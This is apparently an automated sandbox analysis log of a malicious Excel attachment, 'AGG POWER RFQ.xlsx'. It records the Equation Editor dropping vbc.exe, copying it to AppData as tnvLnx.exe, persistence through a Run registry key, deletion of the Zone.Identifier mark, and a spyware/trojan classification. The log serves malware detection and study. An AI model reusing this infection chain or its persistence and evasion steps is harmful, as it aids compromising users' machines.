                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00710048
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00719424
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00715CE8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00715CD9
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_007104D8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_007104C8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00714C88
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00715540
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_0071490D
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_007159F0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_0071927F
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00714668
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00714600
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_007102F8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_007162D8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00716F88
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00446350
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00445330
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00442099
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00445678
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00379020
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037BB10
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037DBA0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037549A
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037FBB0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00372CC0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00374EA0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037AEEF
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00711058
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00710048
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00715CE8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00715CD9
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007104D8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007104C8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00714C88
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00715540
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0071490D
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007159F0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00714600
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007102F8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007162D8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00716F88
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_00205330
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_00206350
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_00202099
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_00205678
                      Source: AGG POWER RFQ.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                      Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tnvLnx.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tnvLnx.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tnvLnx.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: tnvLnx.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: vbc[1].exe.2.dr, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
                      Source: vbc[1].exe.2.dr, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
                      Source: 4.2.vbc.exe.ad0000.2.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.vbc.exe.ad0000.2.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
                      Source: 4.0.vbc.exe.ad0000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.0.vbc.exe.ad0000.0.unpack, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
                      Source: tnvLnx.exe.5.dr, MediaManager/DebuggableAttribute.csCryptographic APIs: 'TransformFinalBlock'
                      Source: tnvLnx.exe.5.dr, MediaManager/DebuggableAttribute.csCryptographic APIs: 'CreateDecryptor'
                      Source: 5.2.vbc.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.vbc.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@12/22@7/2
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$AGG POWER RFQ.xlsxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE7AF.tmpJump to behavior
                      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                      Source: AGG POWER RFQ.xlsxVirustotal: Detection: 27%
                      Source: AGG POWER RFQ.xlsxReversingLabs: Detection: 21%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: AGG POWER RFQ.xlsxStatic file information: File size 1376256 > 1048576
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: UInt32TypeInfo.pdb source: tnvLnx.exe, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp
                      Source: AGG POWER RFQ.xlsxInitial sample: OLE indicators vbamacros = False
                      Source: AGG POWER RFQ.xlsxInitial sample: OLE indicators encrypted = True
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD3BCE push es; ret
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002B1122 push ecx; iretd
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002B117B push edx; iretd
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002B1144 push ecx; iretd
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02003232 push esp; retf
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00AD3BCE push es; ret
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00223868 pushfd ; iretd
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_0022131F pushfd ; iretd
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00221390 pushfd ; iretd
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C58AB pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00213BCE push es; ret
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00713232 push esp; retf
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00213BCE push es; ret
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_0044131F pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00441390 pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00371122 push ecx; ret
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00371144 push ecx; ret
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00713232 push esp; retf
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_002013D0 pushfd ; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.65432769583
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.65432769583
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tnvLnxJump to behavior
                      Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tnvLnxJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
